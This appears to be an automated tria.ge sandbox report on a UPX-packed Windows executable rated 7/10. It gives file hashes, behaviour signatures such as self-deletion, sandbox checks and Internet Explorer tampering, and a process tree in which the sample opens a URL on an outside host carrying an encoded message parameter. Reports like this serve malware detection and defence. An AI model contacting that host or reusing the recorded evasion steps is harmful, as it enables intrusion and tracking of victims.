Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

7

05f8cceb91...17.exe

windows7-x64

7

05f8cceb91...17.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    121s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    24/12/2023, 16:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    05f8cceb91ad96e3fec180ad4fc6c317.exe

  • Size

    158KB

  • MD5

    05f8cceb91ad96e3fec180ad4fc6c317

  • SHA1

    5ef7ee929bbd7b44b365302391ae2e1fedc04b97

  • SHA256

    c26dcbf785274d324bd3d52d5cca862c0b4eb3f8e52ea2d28730f468fc0a61ed

  • SHA512

    602e4831a0ef7eece355ce911c2de1382b2e5bde06e3af9eaa23ade68c28bc44d21842e36d1a8b97eb78c08195090318836486b20c7a54809a89192db34a644e

  • SSDEEP

    3072:fwABjrG3Vi/cOBLUsmyi4AHhmTdI3wIe0HRDLVT/sOrVzzXZ:oGjrUVecOJUsmdmdI3vPRDLp/s0zJ

Score
7/10
upx

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\05f8cceb91ad96e3fec180ad4fc6c317.exe
    "C:\Users\Admin\AppData\Local\Temp\05f8cceb91ad96e3fec180ad4fc6c317.exe"
    1⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\365f1660fcbd54cfe759d701551944e9.bat
      2⤵
      • Deletes itself
      PID:1864
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://wl.cabolar.com/v3062/repins.jpg?msg=p1DQpfv3egf1OKvF3kRK4w4vM2yYLaHShjzxm94D33J543uklXvmfFoY6%2F1YHQmFMTOuEX7HYj7RZxpzgh5Zs7XNcq5Ecigl5IGf7U3H9tFmyM7ZIcXyp5tSXxG3076j
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2864 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2804

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    0aaf65e27bc46f209c3abf16d29133c2

    SHA1

    ad25af6a10c922f5e9df49ab558825fc055688a6

    SHA256

    c21cb41ddc5b9c64c0a2a4989c974ee0073a96af5b77125e58bf492e87f12c19

    SHA512

    f37b9ea73256116e897fff6959584c62b3d955d56cd06fc6f82142e2bc782c56d51a9a39da53082be7e9ae32d4c815fd3b987a5d58a73ca233ba9bc480a3b13c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    6b27e420d3312719821c60d0e7f60353

    SHA1

    e6e2c6d1b45191da5864751c6021ef7875c0734c

    SHA256

    b8d71f7e9d2f252b404ee941284501da1bbe20681d39ee2083ffe44b2c65ce71

    SHA512

    1d068496a800cb1f5c7219f0556e24660cc0f8f633430adb4e19725d85efde57b0f39f2733ae444efca52501c3d65a20045bcf05932662dd18f663fc0a4bbf2e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    7efc4489db4af47cfd578e98fb17fcf6

    SHA1

    a7b1b427dd7cd28ad5b4b5bff6bef925493e07b6

    SHA256

    6427e249d64a159893f151ad0678195233134a9cf0680a5d912cbffd930423b5

    SHA512

    370e285599b21ccaee3f792796beb467d877bde4722548f5ec2f2c6f461801435aa15a67757f968137a6962a6f0e1c6e6997ecf9dd8bf6ef68585f80436e62b5

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    86a1a03742392cc99b87f21e567e3d31

    SHA1

    3a107761077af4fc33eb348806624544122f79d5

    SHA256

    fa11c9daf9df841b05401c3cae7b69d37767d0e932e8f187010691e0deef2dc6

    SHA512

    474a69c8306e749b73f97db939d8a14bec7cf9cd686716f5d18e72ae703ac5651804097b4317e0db91e635ca324154428da5f47a3f31ac4a338be1968545ac87

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    f3e3d72d15a5f099b599ae8195381664

    SHA1

    6f8dd6f348d9e2efe65c8f26e9454db183a28d9f

    SHA256

    08f8e6d76a388263f2c0899f21ce43952497703ea071122ab0445875227ea403

    SHA512

    498cb13fa5df9744e33a38fbc3e2249ba2a85f6d983ce50615e81feed27fcc5643443648c2237d77788532a66a6d77d771045d3724c329875b4cedab07042998

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    dbaf62ca569aa9c886ce3997bf016d7c

    SHA1

    c2cdf67a0fd2b83f21890d1aa4560874379bc809

    SHA256

    22cc1df6ddb0bbaf6d04961940ac222cb007498ee72c0465d40dd9e94d48c757

    SHA512

    a2bd76ee40276302bbc765fbb4d1a14e7e75710842cc3de31c34c3ab097d3643b17100d6413828ba7d0d1152047dbe710d178d2489736e45d18e40ed7e38e1fc

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    8fa761166be9f0606095f9ff1de0e4ba

    SHA1

    f5fd7593ac65a331d57e0cc9092096365667d920

    SHA256

    166c6023881c374694c9d7df27b9d990d462bb2272568730f458848a22e3d639

    SHA512

    063fbe1b59a4f93a578fcd6788365939d3aebcd975b420702656ebcff4ff2edad30b68420400485c24908f5bd13cf690c61682d7d69ff45840d1c5ba66ae082a

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    2af6e9cf1f6b1a6aac0a7d7132eddce1

    SHA1

    0fed6a316b73fd42f85d91bcbc0ee39d5d1d3dba

    SHA256

    6b04bbb9fdbeb1e7dc6881579a45a8970e520a6f57dad86800156ea23ad3bb25

    SHA512

    a2ac0ed6c72ef44c9bd9c0546f3327aeec325d0dc2b044e069861e7787e6de77b7899836faf16ff3a50d32c2e87a23d3b6fb9da0faa96ae8ead657a1ae21dd36

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    f6e29b4e061942788d5007ad13f71149

    SHA1

    61d574aaee52556bf076f8c81040cec4006f7ecc

    SHA256

    2c1eff0e20d0a04810d2c011822b1fd4ab5f8a7fa8f28091bdd5d7d44265eff0

    SHA512

    2e32121bd70054a6a48f63fc69ee1ff795be467d2a7dabea276fd7d58d403a56787397400a2698faa9ca308ecf36377d25013ae0acf29f4b8daa8690916331b4

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    53280537f4e0cc3521eaa4ae26e1f480

    SHA1

    c4ab591002db403fd53d0dc1470ce4ff0e389516

    SHA256

    d9a2e713d3f2474dea13fa1eb6284c1090eb79f3e087cc45b799298caf7ff9e3

    SHA512

    46f5f0ff0b0c1e2e0beec4d2a202a40532cefd142205a4e660dd6a237be82eefe355d35c8f0c8312c2d1405980d9d4e18dbac27624052fc73a040553c8ca41f6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\365f1660fcbd54cfe759d701551944e9.bat
    Filesize

    209B

    MD5

    b242e31afbaca989199577e81afad09d

    SHA1

    c934dfe9b757f4dc531206d659ba221b040f69cb

    SHA256

    04a1de4fb33c358b0e721393530b89162467cdb54ce985eb215d45eb403041c2

    SHA512

    d9293efd93964481989d3597f62cee291c2aa6a69d651b63309197d9b13d91ef6246579f8ff42136f19e43c10854cea2a45561636235907c33d14ab5081d54af

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab86CF.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar877E.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    Download Submit

  • memory/2280-15-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

    Download

  • memory/2280-0-0x0000000000400000-0x0000000000435000-memory.dmp

    Filesize

    212KB

    Download